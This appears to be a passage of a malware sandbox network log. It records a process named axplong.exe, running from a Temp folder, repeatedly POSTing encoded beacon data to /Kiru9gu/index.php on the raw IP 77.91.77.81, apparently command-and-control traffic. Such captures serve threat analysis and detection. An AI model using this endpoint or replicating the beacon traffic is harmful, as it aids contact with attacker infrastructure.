Jul 2, 2024 00:25:07.381619930 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:07.608875036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:07.801911116 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:08.560523033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:08.561197042 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:08.791405916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:08.902273893 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:09.594219923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:09.595238924 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:09.815053940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:09.937644958 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:10.671236992 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:10.696626902 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:10.930313110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:11.266443014 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:11.985855103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:11.986768961 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:12.205467939 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:12.327614069 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:13.035478115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:13.036891937 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:13.263062000 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:13.392848015 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:14.127356052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:14.171030045 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:14.389394999 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:14.686851025 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:15.407799959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:15.446172953 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:15.672854900 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49741	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:15.794337034 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:16.525230885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:16.534236908 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:16.753561020 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49743	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:16.871475935 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:17.585386038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:17.799068928 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:18.025494099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49746	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:18.796602011 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:19.490165949 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:19.490986109 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:19.712841034 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49748	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:19.826744080 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:20.539058924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:20.540147066 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:20.758532047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:20.874248028 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:21.580080032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:21.588300943 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:21.811398029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
